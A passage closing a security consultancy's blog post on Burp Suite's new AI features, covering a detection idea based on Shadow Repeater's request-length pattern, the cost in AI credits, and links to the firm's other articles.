Furthermore, I think there are some cool opportunities here from a detection perspective for Shadow Repeater. I primarily focus on internal network assessments, and Endpoint Detection and Response (EDR) has taken great strides over the past few years to specifically be able to identify potentially malicious behavior based on patterns. An example is a program calling an API to allocate some memory, then an API to write to that memory, then an API to make that memory executable, before a final API to execute code from somewhere in that memory region.

I think a similar can be applied here to the Shadow Repeater – Each AI request initially orientates itself with a 4-character request, then two 6-character requests, before sending an 8-character request. These requests, less than a second apart from the same source IP, could be an indicator of someone having Shadow Repeater running when browsing your application. Maybe that’s far-fetched, but it was just an idea. EDRs love a pattern… Do WAFs?

Finally, to answer my own question from earlier regarding credits. After playing with these features and writing this post, I used about 1665 credits, which equates to about $0.8325. This was somewhat surprising to me. I suspect that the bulk was from Hackvertor, as I presume this uses more tokens than Shadow Repeater, especially when whole requests are being sent for analysis. You can check your remaining credits within your PortSwigger dashboard, as seen below:

Or, in the bottom right corner of the Burp Suite UI:

Overall, the new features are just the tip of the iceberg. If I know anything about the team at PortSwigger, these will be followed by some innovative and novel ideas that end up blowing my tiny little brain. I look forward to seeing the improvements made to these specific features, and the BurpAI ecosystem in general, but overall, I think it’s starting off in a great place and has huge potential upsides.

Whether you are a web application tester just keen to learn about the new features, a bug bounty hunter perfecting his trade, or maybe a network tester trying to improve at web application hacking, I hope you took some value from this blog post. If you are reading this as a concerned sysadmin or CISO, feel free to get in touch and we can help you solve your security headaches.

Keep an eye out for another post soon where we’ll go through the process of writing a basic extension with AI features, which can be integrated with the Montoya API. Until then, I’d recommend checking out some of the other blogs on our site, such as Josiah’s introduction to browser hacking and v8 vulnerabilities, Tom’s dive into abusing misconfigured Active Directory Certificate Services, or our director Alex’s look into how attacker’s can use temporary credentials to attack AWS environments.

Finally, happy hacking!😊